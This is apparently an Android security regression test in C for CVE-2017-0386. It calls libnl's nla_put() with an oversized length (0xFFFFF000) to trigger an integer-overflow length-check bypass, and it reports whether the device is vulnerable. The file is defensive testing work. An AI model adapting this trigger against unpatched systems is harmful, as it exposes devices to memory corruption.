1 /**
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
#define _GNU_SOURCE

#define LOG_TAG "CVE-2017-0386"

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <log/log.h>
#include <netlink/msg.h>
#include <netlink/netlink.h>
#include <netlink-private/object-api.h>
#include <netlink-private/types.h>
#include <netlink/object.h>
#include <netlink/attr.h>

#include "../includes/common.h"
32
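/*
 * CVE-2017-0386 regression test for libnl's nla_put().
 *
 * Builds a netlink message, appends one baseline attribute so that
 * nlmsg_len has a known value, then asks nla_put() to append an attribute
 * whose length (0xFFFFF000) cannot fit in the message. A patched libnl
 * rejects that request and leaves nlmsg_len unchanged; if nlmsg_len differs
 * from the baseline afterwards, the length check was bypassed.
 *
 * Returns EXIT_SUCCESS when nlmsg_len is unchanged, EXIT_VULNERABLE (113,
 * from common.h) when it changed, and EXIT_FAILURE when the test could not
 * be set up (allocation failure or a failing baseline nla_put()).
 *
 * All resources are released through the single "out" label; the previous
 * cleanup freed only when the pointers were NULL, i.e. never.
 */
int main(void) {
    struct nl_msg *message = NULL;
    struct nlmsghdr *hdr = NULL;
    char *data = NULL;
    uint32_t result = 0;
    int ret = EXIT_FAILURE;
    int pagesize = getpagesize();
    /* Baseline attribute size, chosen relative to the page-sized message. */
    size_t payloadlength = pagesize + 12 - 0x30;
    size_t payload2length = pagesize;

    message = nlmsg_alloc();
    if (message == NULL) {
        ALOGE("Alloc message memory failed");
        goto out;
    }

    ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
    hdr = message->nm_nlh;

    /* Allocate and fill the baseline payload. */
    data = malloc(payloadlength);
    if (data == NULL) {
        ALOGE("Alloc data memory failed");
        goto out;
    }
    memset(data, 0x41, payloadlength);

    /*
     * The baseline must land in the message; without it the length
     * comparison below says nothing about the oversized request.
     */
    if (nla_put(message, 0x4444, payloadlength, data) != 0) {
        ALOGE("Baseline nla_put failed");
        goto out;
    }
    result = hdr->nlmsg_len;
    ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", result);

    free(data);
    data = NULL;

    /* Second payload, one page long. */
    data = malloc(payload2length);
    if (data == NULL) {
        ALOGE("Alloc data2 memory failed");
        goto out;
    }
    memset(data, 0x33, payload2length);
    ALOGI("\n\n\nPutting down overflow.......\n\n\n");

    /*
     * Oversized length: a patched nla_put() returns an error and leaves
     * nlmsg_len untouched. The return value is logged for diagnosis only;
     * the verdict is taken from nlmsg_len, as before.
     */
    int rc = nla_put(message, 0x8888, 0xFFFFF000, data);
    ALOGI("second nla_put returned %d", rc);

    ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
    ALOGI("message len = 0x%x", hdr->nlmsg_len);

    /* Return 113 (EXIT_VULNERABLE) if the message length changed. */
    ret = (result != hdr->nlmsg_len) ? EXIT_VULNERABLE : EXIT_SUCCESS;

out:
    /* free(NULL) is a no-op, so no guard is needed for data. */
    free(data);
    if (message != NULL) {
        nlmsg_free(message);
    }
    return ret;
}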
101